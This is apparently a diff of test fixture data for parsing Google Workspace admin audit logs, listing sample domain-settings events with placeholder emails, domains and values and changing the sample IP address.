-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_LOGIN_ACTIVITY_TRACE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_ENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"},{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"PLAY_FOR_WORK_UNENROLL","parameters":[{"name":"PLAY_FOR_WORK_MDM_VENDOR_NAME","value":"vendor"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"MX_RECORD_VERIFICATION_CLAIM","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_NEW_APP_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPLOAD_OAUTH_CERTIFICATE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REGENERATE_OAUTH_CONSUMER_SECRET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OPEN_ID_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ORGANIZATION_NAME","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OUTBOUND_RELAY","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MAX_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PASSWORD_MIN_LENGTH","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_PRIMARY_ADMIN_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_SERVICE_OR_FEATURE_NOTIFICATIONS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_APPLICATION_FROM_WHITELIST","parameters":[{"name":"APP_ID","value":"appid"},{"name":"APPLICATION_NAME","value":"app name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RENEW_DOMAIN_REGISTRATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RESELLER_ACCESS","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RULE_ACTIONS_CHANGED","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_RULE_CRITERIA","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_RULE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"RULE_STATUS_CHANGED","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"RULE_NAME","value":"rule"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"ADD_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN_MX","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_SECONDARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SECONDARY_DOMAIN_NAME","value":"example2.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_DOMAIN_SECONDARY_EMAIL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_SSO_SETTINGS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"GENERATE_PIN"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOMAIN_SETTINGS","name":"UPDATE_RULE","parameters":[{"name":"RULE_NAME","value":"rule"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ACCOUNT_AUTO_RENEWAL","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"NON_AUTO_RENEWAL"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_ENABLED","value":"app enabled"},{"name":"APPLICATION_NAME","value":"app name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_APPLICATION_TO_WHITELIST","parameters":[{"name":"APP_ID","value":"id"},{"name":"APPLICATION_NAME","value":"app name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ADVERTISEMENT_OPTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_ALERT_CRITERIA","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"DELETE_ALERT","parameters":[{"name":"ALERT_NAME","value":"alert name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_RECEIVERS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"RENAME_ALERT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ALERT_STATUS_CHANGED","parameters":[{"name":"ALERT_NAME","value":"alert name"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ADD_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"SKIP_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS_MX","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"VERIFY_DOMAIN_ALIAS","parameters":[{"name":"DOMAIN_ALIAS","value":"alias"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"DOMAIN_VERIFICATION_METHOD","value":"ANALYTICS"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_API_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"true"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"AUTHORIZE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"},{"name":"API_SCOPES","multiValue":["a","b"]}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"REMOVE_API_CLIENT_ACCESS","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"API_CLIENT_NAME","value":"api client"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHROME_LICENSES_REDEEMED","parameters":[{"name":"APP_LICENSES_ORDER_NUMBER","value":"abcd123"},{"name":"APPLICATION_NAME","value":"app name"},{"name":"CHROME_NUM_LICENSES_PURCHASED","intValue":1}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_AUTO_ADD_NEW_SERVICE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_PRIMARY_DOMAIN","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_WHITELIST_SETTING","parameters":[{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"COMMUNICATION_PREFERENCES_SETTING_CHANGE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CONFLICT_ACCOUNT_ACTION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"ENABLE_FEEDBACK_SOLICITATION","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"},{"name":"OLD_VALUE","value":"old"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_CONTACT_SHARING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CREATE_PLAY_FOR_WORK_TOKEN","parameters":[{"name":"PLAY_FOR_WORK_TOKEN_ID","value":"token"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"TOGGLE_USE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"false"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOMAIN_SETTINGS","name":"CHANGE_CUSTOM_LOGO","parameters":[{"name":"DOMAIN_NAME","value":"example.com"}]}} 
